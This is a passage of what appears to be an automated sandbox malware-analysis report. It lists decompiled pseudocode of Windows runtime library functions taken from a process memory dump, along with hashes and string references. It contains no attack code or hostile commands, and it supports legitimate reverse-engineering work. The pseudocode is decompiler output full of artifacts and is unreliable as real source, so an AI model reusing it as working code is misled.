                    							__eflags = _t79;
                    							if(_t79 != 0) {
                    								__eflags = _t79 - 0xc;
                    								if(_t79 == 0xc) {
                    									goto L43;
                    								} else {
                    									goto L9;
                    								}
                    							} else {
                    								_t170 = _t170 | 0x00000008;
                    								__eflags = _t170;
                    								L9:
                    								_t81 = _t170 & 0x00000300;
                    								__eflags = _t81 - 0x300;
                    								if(_t81 == 0x300) {
                    									goto L43;
                    								} else {
                    									_t138 = _t170 & 0x00000001;
                    									__eflags = _t138;
                    									_v24 = _t138;
                    									if(_t138 != 0) {
                    										__eflags = _t81;
                    										if(_t81 != 0) {
                    											goto L43;
                    										} else {
                    											goto L11;
                    										}
                    									} else {
                    										L11:
                    										_push(_t129);
                    										_t77 = E01676D90( &_v20);
                    										_t130 = _t77;
                    										__eflags = _t130;
                    										if(_t130 >= 0) {
                    											_push(_t174);
                    											__eflags = _t170 & 0x00000301;
                    											if((_t170 & 0x00000301) == 0) {
                    												_t176 = _a8;
                    												__eflags = _t176;
                    												if(__eflags == 0) {
                    													L64:
                    													_t83 =  *[fs:0x18];
                    													_t177 = 0;
                    													__eflags =  *(_t83 + 0xfb8);
                    													if( *(_t83 + 0xfb8) != 0) {
                    														E016776E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                    														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                    													}
                    													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                    													goto L15;
                    												} else {
                    													asm("sbb edx, edx");
                    													_t114 = E01708938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                    													__eflags = _t114;
                    													if(_t114 < 0) {
                    														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                    														E0166B150();
                    													}
                    													_t116 = E01706D81(_t176,  &_v16);
                    													__eflags = _t116;
                    													if(_t116 >= 0) {
                    														__eflags = _v16 - 2;
                    														if(_v16 < 2) {
                    															L56:
                    															_t118 = E016775CE(_v20, 5, 0);
                    															__eflags = _t118;
                    															if(_t118 < 0) {
                    																L67:
                    																_t130 = 0xc0000017;
                    																goto L32;
                    															} else {
                    																__eflags = _v12;
                    																if(_v12 == 0) {
                    																	goto L67;
                    																} else {
                    																	_t153 =  *0x1758638; // 0x0
                    																	_t122 = L016738A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                    																	_t154 = _v12;
                    																	_t130 = _t122;
                    																	__eflags = _t130;
                    																	if(_t130 >= 0) {
                    																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                    																		__eflags = _t123;
                    																		if(_t123 != 0) {
                    																			_t155 = _a12;
                    																			__eflags = _t155;
                    																			if(_t155 != 0) {
                    																				 *_t155 = _t123;
                    																			}
                    																			goto L64;
                    																		} else {
                    																			E016776E2(_t154);
                    																			goto L41;
                    																		}
                    																	} else {
                    																		E016776E2(_t154);
                    																		_t177 = 0;
                    																		goto L18;
                    																	}
                    																}
                    															}
                    														} else {
                    															__eflags =  *_t176;
                    															if( *_t176 != 0) {
                    																goto L56;
                    															} else {
                    																__eflags =  *(_t176 + 2);
                    																if( *(_t176 + 2) == 0) {
                    																	goto L64;
                    																} else {
                    																	goto L56;
                    																}
                    															}
                    														}
                    													} else {
                    														_t130 = 0xc000000d;
                    														goto L32;
                    													}
                    												}
                    												goto L35;
                    											} else {
                    												__eflags = _a8;
                    												if(_a8 != 0) {
                    													_t77 = 0xc000000d;
                    												} else {
                    													_v5 = 1;
                    													L0169FCE3(_v20, _t170);
                    													_t177 = 0;
                    													__eflags = 0;
                    													L15:
                    													_t85 =  *[fs:0x18];
                    													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                    													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                    														L18:
                    														__eflags = _t130;
                    														if(_t130 != 0) {
                    															goto L32;
                    														} else {
                    															__eflags = _v5 - _t130;
                    															if(_v5 == _t130) {
                    																goto L32;
                    															} else {
                    																_t86 =  *[fs:0x18];
                    																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                    																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                    																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                    																}
                    																__eflags = _t177;
                    																if(_t177 == 0) {
                    																	L31:
                    																	__eflags = 0;
                    																	L016770F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                    																	goto L32;
                    																} else {
                    																	__eflags = _v24;
                    																	_t91 =  *(_t177 + 0x20);
                    																	if(_v24 != 0) {
                    																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                    																		goto L31;
                    																	} else {
                    																		_t141 = _t91 & 0x00000040;
                    																		__eflags = _t170 & 0x00000100;
                    																		if((_t170 & 0x00000100) == 0) {
                    																			__eflags = _t141;
                    																			if(_t141 == 0) {
                    																				L74:
                    																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                    																				goto L27;
                    																			} else {
                    																				_t177 = E0169FD22(_t177);
                    																				__eflags = _t177;
                    																				if(_t177 == 0) {
                    																					goto L42;
                    																				} else {
                    																					_t130 = E0169FD9B(_t177, 0, 4);
                    																					__eflags = _t130;
                    																					if(_t130 != 0) {
                    																						goto L42;
                    																					} else {
                    																						_t68 = _t177 + 0x20;
                    																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                    																						__eflags =  *_t68;
                    																						_t91 =  *(_t177 + 0x20);
                    																						goto L74;
                    																					}
                    																				}
                    																			}
                    																			goto L35;
                    																		} else {
                    																			__eflags = _t141;
                    																			if(_t141 != 0) {
                    																				_t177 = E0169FD22(_t177);
                    																				__eflags = _t177;
                    																				if(_t177 == 0) {
                    																					L42:
                    																					_t77 = 0xc0000001;
                    																					goto L33;
                    																				} else {
                    																					_t130 = E0169FD9B(_t177, 0, 4);
                    																					__eflags = _t130;
                    																					if(_t130 != 0) {
                    																						goto L42;
                    																					} else {
                    																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                    																						_t91 =  *(_t177 + 0x20);
                    																						goto L26;
                    																					}
                    																				}
                    																				goto L35;
                    																			} else {
                    																				L26:
                    																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                    																				__eflags = _t94;
                    																				L27:
                    																				 *(_t177 + 0x20) = _t94;
                    																				__eflags = _t170 & 0x00008000;
                    																				if((_t170 & 0x00008000) != 0) {
                    																					_t95 = _a12;
                    																					__eflags = _t95;
                    																					if(_t95 != 0) {
                    																						_t96 =  *_t95;
                    																						__eflags = _t96;
                    																						if(_t96 != 0) {
                    																							 *((short*)(_t177 + 0x22)) = 0;
                    																							_t40 = _t177 + 0x20;
                    																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                    																							__eflags =  *_t40;
                    																						}
                    																					}
                    																				}
                    																				goto L31;
                    																			}
                    																		}
                    																	}
                    																}
                    															}
                    														}
                    													} else {
                    														_t147 =  *( *[fs:0x18] + 0xfc0);
                    														_t106 =  *(_t147 + 0x20);
                    														__eflags = _t106 & 0x00000040;
                    														if((_t106 & 0x00000040) != 0) {
                    															_t147 = E0169FD22(_t147);
                    															__eflags = _t147;
                    															if(_t147 == 0) {
                    																L41:
                    																_t130 = 0xc0000001;
                    																L32:
                    																_t77 = _t130;
                    																goto L33;
                    															} else {
                    																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                    																_t106 =  *(_t147 + 0x20);
                    																goto L17;
                    															}
                    															goto L35;
                    														} else {
                    															L17:
                    															_t108 = _t106 | 0x00000080;
                    															__eflags = _t108;
                    															 *(_t147 + 0x20) = _t108;
                    															 *( *[fs:0x18] + 0xfc0) = _t147;
                    															goto L18;
                    														}
                    													}
                    												}
                    											}
                    											L33:
                    										}
                    									}
                    								}
                    							}
                    						}
                    						L35:
                    						return _t77;
                    					} else {
                    						 *_t75 = 0x1757b80;
                    						 *((intOrPtr*)(_t75 + 4)) = _t134;
                    						 *_t134 = _t75;
                    						 *0x1757b84 = _t75;
                    						_t73 = E0167EB70(_t134, 0x1757b60);
                    						if( *0x1757b20 != 0) {
                    							_t73 =  *( *[fs:0x30] + 0xc);
                    							if( *((char*)(_t73 + 0x28)) == 0) {
                    								_t73 = E0167FF60( *0x1757b20);
                    							}
                    						}
                    						goto L5;
                    					}
                    				}
                    			}

                    Strings
                    • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 016DBE0F
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                    • API String ID: 0-865735534
                    • Opcode ID: d4a43f6d7382c38600a12ca405d1d3bf829ced4fa81586a57e6de624038e0279
                    • Instruction ID: 06e0217a67f0479f040be2e8e2945609f478ab01d73c6f7d334bebf7a1f66cc1
                    • Opcode Fuzzy Hash: d4a43f6d7382c38600a12ca405d1d3bf829ced4fa81586a57e6de624038e0279
                    • Instruction Fuzzy Hash: FAA1F671B00746CBEF25DF68CC5077ABBA9AF49710F0685ADE906DB785DB30D8418B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 63%
                    			E01662D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                    				signed char _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				intOrPtr _v28;
                    				intOrPtr _v32;
                    				signed int _v52;
                    				void* __esi;
                    				void* __ebp;
                    				intOrPtr _t55;
                    				signed int _t57;
                    				signed int _t58;
                    				char* _t62;
                    				signed char* _t63;
                    				signed char* _t64;
                    				signed int _t67;
                    				signed int _t72;
                    				signed int _t77;
                    				signed int _t78;
                    				signed int _t88;
                    				intOrPtr _t89;
                    				signed char _t93;
                    				signed int _t97;
                    				signed int _t98;
                    				signed int _t102;
                    				signed int _t103;
                    				intOrPtr _t104;
                    				signed int _t105;
                    				signed int _t106;
                    				signed char _t109;
                    				signed int _t111;
                    				void* _t116;
                    
                    				_t102 = __edi;
                    				_t97 = __edx;
                    				_v12 = _v12 & 0x00000000;
                    				_t55 =  *[fs:0x18];
                    				_t109 = __ecx;
                    				_v8 = __edx;
                    				_t86 = 0;
                    				_v32 = _t55;
                    				_v24 = 0;
                    				_push(__edi);
                    				if(__ecx == 0x1755350) {
                    					_t86 = 1;
                    					_v24 = 1;
                    					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                    				}
                    				_t103 = _t102 | 0xffffffff;
                    				if( *0x1757bc8 != 0) {
                    					_push(0xc000004b);
                    					_push(_t103);
                    					E016A97C0();
                    				}
                    				if( *0x17579c4 != 0) {
                    					_t57 = 0;
                    				} else {
                    					_t57 = 0x17579c8;
                    				}
                    				_v16 = _t57;
                    				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                    					_t93 = _t109;
                    					L23();
                    				}
                    				_t58 =  *_t109;
                    				if(_t58 == _t103) {
                    					__eflags =  *(_t109 + 0x14) & 0x01000000;
                    					_t58 = _t103;
                    					if(__eflags == 0) {
                    						_t93 = _t109;
                    						E01691624(_t86, __eflags);
                    						_t58 =  *_t109;
                    					}
                    				}
                    				_v20 = _v20 & 0x00000000;
                    				if(_t58 != _t103) {
                    					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                    				}
                    				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                    				_t88 = _v16;
                    				_v28 = _t104;
                    				L9:
                    				while(1) {
                    					if(E01687D50() != 0) {
                    						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                    					} else {
                    						_t62 = 0x7ffe0382;
                    					}
                    					if( *_t62 != 0) {
                    						_t63 =  *[fs:0x30];
                    						__eflags = _t63[0x240] & 0x00000002;
                    						if((_t63[0x240] & 0x00000002) != 0) {
                    							_t93 = _t109;
                    							E016FFE87(_t93);
                    						}
                    					}
                    					if(_t104 != 0xffffffff) {
                    						_push(_t88);
                    						_push(0);
                    						_push(_t104);
                    						_t64 = E016A9520();
                    						goto L15;
                    					} else {
                    						while(1) {
                    							_t97 =  &_v8;
                    							_t64 = E0169E18B(_t109 + 4, _t97, 4, _t88, 0);
                    							if(_t64 == 0x102) {
                    								break;
                    							}
                    							_t93 =  *(_t109 + 4);
                    							_v8 = _t93;
                    							if((_t93 & 0x00000002) != 0) {
                    								continue;
                    							}
                    							L15:
                    							if(_t64 == 0x102) {
                    								break;
                    							}
                    							_t89 = _v24;
                    							if(_t64 < 0) {
                    								L016BDF30(_t93, _t97, _t64);
                    								_push(_t93);
                    								_t98 = _t97 | 0xffffffff;
                    								__eflags =  *0x1756901;
                    								_push(_t109);
                    								_v52 = _t98;
                    								if( *0x1756901 != 0) {
                    									_push(0);
                    									_push(1);
                    									_push(0);
                    									_push(0x100003);
                    									_push( &_v12);
                    									_t72 = E016A9980();
                    									__eflags = _t72;
                    									if(_t72 < 0) {
                    										_v12 = _t98 | 0xffffffff;
                    									}
                    								}
                    								asm("lock cmpxchg [ecx], edx");
                    								_t111 = 0;
                    								__eflags = 0;
                    								if(0 != 0) {
                    									__eflags = _v12 - 0xffffffff;
                    									if(_v12 != 0xffffffff) {
                    										_push(_v12);
                    										E016A95D0();
                    									}
                    								} else {
                    									_t111 = _v12;
                    								}
                    								return _t111;
                    							} else {
                    								if(_t89 != 0) {
                    									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                    									_t77 = E01687D50();
                    									__eflags = _t77;
                    									if(_t77 == 0) {
                    										_t64 = 0x7ffe0384;
                    									} else {
                    										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                    									}
                    									__eflags =  *_t64;
                    									if( *_t64 != 0) {
                    										_t64 =  *[fs:0x30];
                    										__eflags = _t64[0x240] & 0x00000004;
                    										if((_t64[0x240] & 0x00000004) != 0) {
                    											_t78 = E01687D50();
                    											__eflags = _t78;
                    											if(_t78 == 0) {
                    												_t64 = 0x7ffe0385;
                    											} else {
                    												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                    											}
                    											__eflags =  *_t64 & 0x00000020;
                    											if(( *_t64 & 0x00000020) != 0) {
                    												_t64 = E016E7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                    											}
                    										}
                    									}
                    								}
                    								return _t64;
                    							}
                    						}
                    						_t97 = _t88;
                    						_t93 = _t109;
                    						E016FFDDA(_t97, _v12);
                    						_t105 =  *_t109;
                    						_t67 = _v12 + 1;
                    						_v12 = _t67;
                    						__eflags = _t105 - 0xffffffff;
                    						if(_t105 == 0xffffffff) {
                    							_t106 = 0;
                    							__eflags = 0;
                    						} else {
                    							_t106 =  *(_t105 + 0x14);
                    						}
                    						__eflags = _t67 - 2;
                    						if(_t67 > 2) {
                    							__eflags = _t109 - 0x1755350;
                    							if(_t109 != 0x1755350) {
                    								__eflags = _t106 - _v20;
                    								if(__eflags == 0) {
                    									_t93 = _t109;
                    									E016FFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                    								}
                    							}
                    						}
                    						_push("RTL: Re-Waiting\n");
                    						_push(0);
                    						_push(0x65);
                    						_v20 = _t106;
                    						E016F5720();
                    						_t104 = _v28;
                    						_t116 = _t116 + 0xc;
                    						continue;
                    					}
                    				}
                    			}

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: RTL: Re-Waiting
                    • API String ID: 0-316354757
                    • Opcode ID: f47a458c03bb90734cbd17ebbc4a4714dbbbd723518ce0c7979589f64ce323cb
                    • Instruction ID: ef35fce7d89f963f90c699386a23e26e35295d571008f40b4f62139d962f312f
                    • Opcode Fuzzy Hash: f47a458c03bb90734cbd17ebbc4a4714dbbbd723518ce0c7979589f64ce323cb
                    • Instruction Fuzzy Hash: B8614471A00205EFDB36DF6CCC90BBEBBA9EB40324F1442ADE911973D1C77099818781
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 80%
                    			E01730EA5(void* __ecx, void* __edx) {
                    				signed int _v20;
                    				char _v24;
                    				intOrPtr _v28;
                    				unsigned int _v32;
                    				signed int _v36;
                    				intOrPtr _v40;
                    				char _v44;
                    				intOrPtr _v64;
                    				void* __ebx;
                    				void* __edi;
                    				signed int _t58;
                    				unsigned int _t60;
                    				intOrPtr _t62;
                    				char* _t67;
                    				char* _t69;
                    				void* _t80;
                    				void* _t83;
                    				intOrPtr _t93;
                    				intOrPtr _t115;
                    				char _t117;
                    				void* _t120;
                    
                    				_t83 = __edx;
                    				_t117 = 0;
                    				_t120 = __ecx;
                    				_v44 = 0;
                    				if(E0172FF69(__ecx,  &_v44,  &_v32) < 0) {
                    					L24:
                    					_t109 = _v44;
                    					if(_v44 != 0) {
                    						E01731074(_t83, _t120, _t109, _t117, _t117);
                    					}
                    					L26:
                    					return _t117;
                    				}
                    				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                    				_t5 = _t83 + 1; // 0x1
                    				_v36 = _t5 << 0xc;
                    				_v40 = _t93;
                    				_t58 =  *(_t93 + 0xc) & 0x40000000;
                    				asm("sbb ebx, ebx");
                    				_t83 = ( ~_t58 & 0x0000003c) + 4;
                    				if(_t58 != 0) {
                    					_push(0);
                    					_push(0x14);
                    					_push( &_v24);
                    					_push(3);
                    					_push(_t93);
                    					_push(0xffffffff);
                    					_t80 = E016A9730();
                    					_t115 = _v64;
                    					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                    						_push(_t93);
                    						E0172A80D(_t115, 1, _v20, _t117);
                    						_t83 = 4;
                    					}
                    				}
                    				if(E0172A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                    					goto L24;
                    				}
                    				_t60 = _v32;
                    				_t97 = (_t60 != 0x100000) + 1;
                    				_t83 = (_v44 -  *0x1758b04 >> 0x14) + (_v44 -  *0x1758b04 >> 0x14);
                    				_v28 = (_t60 != 0x100000) + 1;
                    				_t62 = _t83 + (_t60 >> 0x14) * 2;
                    				_v40 = _t62;
                    				if(_t83 >= _t62) {
                    					L10:
                    					asm("lock xadd [eax], ecx");
                    					asm("lock xadd [eax], ecx");
                    					if(E01687D50() == 0) {
                    						_t67 = 0x7ffe0380;
                    					} else {
                    						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                    					}
                    					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                    						E0172138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                    					}
                    					if(E01687D50() == 0) {
                    						_t69 = 0x7ffe0388;
                    					} else {
                    						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                    					}
                    					if( *_t69 != 0) {
                    						E0171FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                    					}
                    					if(( *0x1758724 & 0x00000008) != 0) {
                    						E017252F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                    					}
                    					_t117 = _v44;
                    					goto L26;
                    				}
                    				while(E017315B5(0x1758ae4, _t83, _t97, _t97) >= 0) {
                    					_t97 = _v28;
                    					_t83 = _t83 + 2;
                    					if(_t83 < _v40) {
                    						continue;
                    					}
                    					goto L10;
                    				}
                    				goto L24;
                    			}

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: `
                    • API String ID: 0-2679148245
                    • Opcode ID: 587144bba8556d279713824b38f5069f9ffcc8e5b05b2165008fd51836fae338
                    • Instruction ID: 41cf3c619c3dff1dca73897f5e578c43151218ed60041701c726aaee5c25bcc9
                    • Opcode Fuzzy Hash: 587144bba8556d279713824b38f5069f9ffcc8e5b05b2165008fd51836fae338
                    • Instruction Fuzzy Hash: D451AF713083429FD325DF28D884B2BFBE5EBC4714F54096CFA9697292D671E806CB62
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E0169F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                    				intOrPtr _v8;
                    				intOrPtr _v12;
                    				intOrPtr _v16;
                    				char* _v20;
                    				intOrPtr _v24;
                    				char _v28;
                    				intOrPtr _v32;
                    				char _v36;
                    				char _v44;
                    				char _v52;
                    				intOrPtr _v56;
                    				char _v60;
                    				intOrPtr _v72;
                    				void* _t51;
                    				void* _t58;
                    				signed short _t82;
                    				short _t84;
                    				signed int _t91;
                    				signed int _t100;
                    				signed short* _t103;
                    				void* _t108;
                    				intOrPtr* _t109;
                    
                    				_t103 = __ecx;
                    				_t82 = __edx;
                    				_t51 = E01684120(0, __ecx, 0,  &_v52, 0, 0, 0);
                    				if(_t51 >= 0) {
                    					_push(0x21);
                    					_push(3);
                    					_v56 =  *0x7ffe02dc;
                    					_v20 =  &_v52;
                    					_push( &_v44);
                    					_v28 = 0x18;
                    					_push( &_v28);
                    					_push(0x100020);
                    					_v24 = 0;
                    					_push( &_v60);
                    					_v16 = 0x40;
                    					_v12 = 0;
                    					_v8 = 0;
                    					_t58 = E016A9830();
                    					_t87 =  *[fs:0x30];
                    					_t108 = _t58;
                    					L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                    					if(_t108 < 0) {
                    						L11:
                    						_t51 = _t108;
                    					} else {
                    						_push(4);
                    						_push(8);
                    						_push( &_v36);
                    						_push( &_v44);
                    						_push(_v60);
                    						_t108 = E016A9990();
                    						if(_t108 < 0) {
                    							L10:
                    							_push(_v60);
                    							E016A95D0();
                    							goto L11;
                    						} else {
                    							_t109 = L01684620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                    							if(_t109 == 0) {
                    								_t108 = 0xc0000017;
                    								goto L10;
                    							} else {
                    								_t21 = _t109 + 0x18; // 0x18
                    								 *((intOrPtr*)(_t109 + 4)) = _v60;
                    								 *_t109 = 1;
                    								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                    								 *(_t109 + 0xe) = _t82;
                    								 *((intOrPtr*)(_t109 + 8)) = _v56;
                    								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                    								E016AF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                    								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                    								 *((short*)(_t109 + 0xc)) =  *_t103;
                    								_t91 =  *_t103 & 0x0000ffff;
                    								_t100 = _t91 & 0xfffffffe;
                    								_t84 = 0x5c;
                    								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                    									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                    										_push(_v60);
                    										E016A95D0();
                    										L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                    										_t51 = 0xc0000106;
                    									} else {
                    										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                    										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                    										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                    										goto L5;
                    									}
                    								} else {
                    									L5:
                    									 *_a4 = _t109;
                    									_t51 = 0;
                    								}
                    							}
                    						}
                    					}
                    				}
                    				return _t51;
                    			}

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: @
                    • API String ID: 0-2766056989
                    • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                    • Instruction ID: 877d7d16e725c5e8d480001fa25a62ee6ed8dacad909a647550761c29cf0397c
                    • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                    • Instruction Fuzzy Hash: CE517A71504711AFC320DF29C840A6BBBF9FF48714F118A2EFA9587690E7B4E904CB95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E016E3540(intOrPtr _a4) {
                    				signed int _v12;
                    				intOrPtr _v88;
                    				intOrPtr _v92;
                    				char _v96;
                    				char _v352;
                    				char _v1072;
                    				intOrPtr _v1140;
                    				intOrPtr _v1148;
                    				char _v1152;
                    				char _v1156;
                    				char _v1160;
                    				char _v1164;
                    				char _v1168;
                    				char* _v1172;
                    				short _v1174;
                    				char _v1176;
                    				char _v1180;
                    				char _v1192;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				short _t41;
                    				short _t42;
                    				intOrPtr _t80;
                    				intOrPtr _t81;
                    				signed int _t82;
                    				void* _t83;
                    
                    				_v12 =  *0x175d360 ^ _t82;
                    				_t41 = 0x14;
                    				_v1176 = _t41;
                    				_t42 = 0x16;
                    				_v1174 = _t42;
                    				_v1164 = 0x100;
                    				_v1172 = L"BinaryHash";
                    				_t81 = E016A0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                    				if(_t81 < 0) {
                    					L11:
                    					_t75 = _t81;
                    					E016E3706(0, _t81, _t79, _t80);
                    					L12:
                    					if(_a4 != 0xc000047f) {
                    						E016AFA60( &_v1152, 0, 0x50);
                    						_v1152 = 0x60c201e;
                    						_v1148 = 1;
                    						_v1140 = E016E3540;
                    						E016AFA60( &_v1072, 0, 0x2cc);
                    						_push( &_v1072);
                    						E016BDDD0( &_v1072, _t75, _t79, _t80, _t81);
                    						E016F0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                    						_push(_v1152);
                    						_push(0xffffffff);
                    						E016A97C0();
                    					}
                    					return E016AB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                    				}
                    				_t79 =  &_v352;
                    				_t81 = E016E3971(0, _a4,  &_v352,  &_v1156);
                    				if(_t81 < 0) {
                    					goto L11;
                    				}
                    				_t75 = _v1156;
                    				_t79 =  &_v1160;
                    				_t81 = E016E3884(_v1156,  &_v1160,  &_v1168);
                    				if(_t81 >= 0) {
                    					_t80 = _v1160;
                    					E016AFA60( &_v96, 0, 0x50);
                    					_t83 = _t83 + 0xc;
                    					_push( &_v1180);
                    					_push(0x50);
                    					_push( &_v96);
                    					_push(2);
                    					_push( &_v1176);
                    					_push(_v1156);
                    					_t81 = E016A9650();
                    					if(_t81 >= 0) {
                    						if(_v92 != 3 || _v88 == 0) {
                    							_t81 = 0xc000090b;
                    						}
                    						if(_t81 >= 0) {
                    							_t75 = _a4;
                    							_t79 =  &_v352;
                    							E016E3787(_a4,  &_v352, _t80);
                    						}
                    					}
                    					L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                    				}
                    				_push(_v1156);
                    				E016A95D0();
                    				if(_t81 >= 0) {
                    					goto L12;
                    				} else {
                    					goto L11;
                    				}
                    			}

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: BinaryHash
                    • API String ID: 0-2202222882
                    • Opcode ID: c8c6cc766b8d40657a85675f5d5dc576299c05f2a0c4b218b811278345b3cfa8
                    • Instruction ID: be88f7a8e3efe557df6d5b1c27a106e276033fc911a4b13e9204317f83b9db51
                    • Opcode Fuzzy Hash: c8c6cc766b8d40657a85675f5d5dc576299c05f2a0c4b218b811278345b3cfa8
                    • Instruction Fuzzy Hash: 474158B1D0152D9BDB21DA60CC84FEEB77DAB44714F0045D9EB09A7240DB309E88CF98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 71%
                    			E017305AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                    				signed int _v20;
                    				char _v24;
                    				signed int _v28;
                    				char _v32;
                    				signed int _v36;
                    				intOrPtr _v40;
                    				void* __ebx;
                    				void* _t35;
                    				signed int _t42;
                    				char* _t48;
                    				signed int _t59;
                    				signed char _t61;
                    				signed int* _t79;
                    				void* _t88;
                    
                    				_v28 = __edx;
                    				_t79 = __ecx;
                    				if(E017307DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                    					L13:
                    					_t35 = 0;
                    					L14:
                    					return _t35;
                    				}
                    				_t61 = __ecx[1];
                    				_t59 = __ecx[0xf];
                    				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                    				_v36 = _a8 << 0xc;
